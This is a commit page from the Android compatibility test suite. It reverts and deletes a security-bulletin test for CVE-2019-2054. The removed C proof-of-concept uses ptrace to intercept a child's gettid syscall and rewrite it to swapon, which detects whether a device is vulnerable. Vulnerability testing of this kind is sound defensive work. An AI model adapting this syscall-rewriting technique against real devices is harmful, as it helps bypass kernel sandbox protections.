diff options
author | Matthew Fitzpatrick <mafitzpatrick@google.com> | 2019-07-10 14:26:58 -0700 |
---|---|---|
committer | android-build-merger <android-build-merger@google.com> | 2019-07-10 14:26:58 -0700 |
commit | e0f16805d56a6320c99768f1f4af0d8cc7b38a50 (patch) | |
tree | dcf7c2090520f456d26556fb0c7d09c0471fcc4d | |
parent | 80e7cd49fadbdbf623a5a23a87307520fb1af028 (diff) | |
parent | 78fa3fd9e14256a714709c60fee3b3bb718f3411 (diff) | |
download | platform_cts-e0f16805d56a6320c99768f1f4af0d8cc7b38a50.tar.gz platform_cts-e0f16805d56a6320c99768f1f4af0d8cc7b38a50.tar.bz2 platform_cts-e0f16805d56a6320c99768f1f4af0d8cc7b38a50.zip |
Merge "Revert "Merge commit '585279ec7a64f4746b554b434c8b99f577633272' into am-45b398c5-1b45-4876-91cb-b88473f164b9"" into oc-dev
am: 78fa3fd9e1
Change-Id: Ib181cc15a5581ed43df3d6a894f7cb75178b2f85
4 files changed, 0 insertions, 201 deletions
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index 6e6fc326fb7..c1336cf9d16 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -188,11 +188,6 @@ <!-- Please add tests solely from this bulletin below to avoid merge conflict --> <option name="push" value="Bug-115739809->/data/local/tmp/Bug-115739809" /> - <!--__________________--> - <!-- Bulletin 2019-05 --> - <!-- Please add tests solely from this bulletin below to avoid merge conflict --> - <option name="push" value="CVE-2019-2054->/data/local/tmp/CVE-2019-2054" /> - <option name="append-bitness" value="true" /> </target_preparer> diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2054/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2054/Android.mk deleted file mode 100644 index 5a712179e07..00000000000 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2054/Android.mk +++ /dev/null @@ -1,31 +0,0 @@ -# Copyright (C) 2019 The Android Open Source Project -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -LOCAL_PATH := $(call my-dir) - -include $(CLEAR_VARS) -LOCAL_MODULE := CVE-2019-2054 -LOCAL_SRC_FILES := poc.c -LOCAL_MULTILIB := both -LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32 -LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64 - -# Tag this module as a sts test artifact -LOCAL_COMPATIBILITY_SUITE := cts sts vts -LOCAL_CTS_TEST_PACKAGE := android.security.cts - -LOCAL_ARM_MODE := arm -LOCAL_CFLAGS = -Wall -Werror - -include $(BUILD_CTS_EXECUTABLE)
\ No newline at end of file diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2054/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2054/poc.c deleted file mode 100644 index 578c90a2747..00000000000 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2054/poc.c +++ /dev/null @@ -1,135 +0,0 @@ -/** - * Copyright (C) 2019 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -#include <err.h> -#include <errno.h> -#include <linux/elf.h> -#include <stdio.h> -#include <stdlib.h> -#include <string.h> -#include <sys/ptrace.h> -#include <sys/syscall.h> -#include <sys/types.h> -#include <sys/uio.h> -#include <sys/wait.h> -#include <unistd.h> - -#include "../includes/common.h" - -time_t test_started; - -int main(void) { - pid_t my_pid = -1; - - setbuf(stdout, NULL); - - pid_t child = fork(); - - switch (child) { - case -1: - // child = -1 => the creation of a child process was unsuccessful. - err(1, "fork"); - return EXIT_FAILURE; - - case 0: - // child = 0 => Returned to the newly created child process - my_pid = getpid(); - test_started = start_timer(); - - while (timer_active(test_started)) { - errno = 0; - int res = syscall(__NR_gettid, 0, 0); - if (res != my_pid) { - printf("%d (%s)\n", res, strerror(errno)); - return EXIT_VULNERABLE; - } - } - return EXIT_SUCCESS; - - default: - // child > 0 => Returned to parent process. - // The value contains process ID of its newly created child process. - sleep(1); - - if (ptrace(PTRACE_ATTACH, child, NULL, NULL)) { - err(1, "main() : ptrace attach"); - return EXIT_FAILURE; - } - - int status; - if (waitpid(child, &status, 0) != child) { - err(1, "main() : wait for child"); - return EXIT_FAILURE; - } - - if (ptrace(PTRACE_SYSCALL, child, NULL, NULL)) { - err(1, "main() : ptrace syscall entry"); - return EXIT_FAILURE; - } - - if (waitpid(child, &status, 0) != child) { - err(1, "main() : wait for child"); - return EXIT_FAILURE; - } - - int syscallno; - struct iovec iov = {.iov_base = &syscallno, .iov_len = sizeof(syscallno)}; - - if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) { - err(1, "main() : ptrace getregs"); - return EXIT_FAILURE; - } - - printf("main() : seeing syscall %d\n", syscallno); - if (syscallno != __NR_gettid) { - err(1, "main() : not gettid"); - return EXIT_FAILURE; - } - - syscallno = __NR_swapon; - if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov)) { - err(1, "main() : ptrace setregs"); - return EXIT_FAILURE; - } - - if (ptrace(PTRACE_DETACH, child, NULL, NULL)) { - err(1, "main() : ptrace syscall"); - return EXIT_FAILURE; - } - // kill child proces - int killRet = kill(child, SIGCONT); - if (killRet == -1) { - printf( - "main() : killing child process(%d) with SIGCONT on error (%s)\n", - child, strerror(errno)); - } - - // wait for child process stop - int waitPid = waitpid(child, &status, 0); - if (waitPid == -1) { - perror("main() waitpid: waitpid = -1 and continue wait"); - return EXIT_FAILURE; - } - - if (WIFEXITED(status)) { - // detected vulnarable exit status of child process - printf("main() : Exit Vulnerable: child = %d, status=%d\n", child, WEXITSTATUS(status)); - return WEXITSTATUS(status); - } - break; - } - - return EXIT_SUCCESS; -}
\ No newline at end of file diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java deleted file mode 100644 index 7eedaf19659..00000000000 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java +++ /dev/null @@ -1,30 +0,0 @@ -/** - * Copyright (C) 2019 The Android Open Source Project - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ - -package android.security.cts; - -import android.platform.test.annotations.SecurityTest; - -public class Poc19_05 extends SecurityTestCase { - - /** - * b/129559484 - */ - @SecurityTest(minPatchLevel = "2019-05") - public void testPocCVE_2019_2054() throws Exception { - AdbUtils.runPocAssertExitStatusNotVulnerable("CVE-2019-2054", getDevice(), 60); - } -} |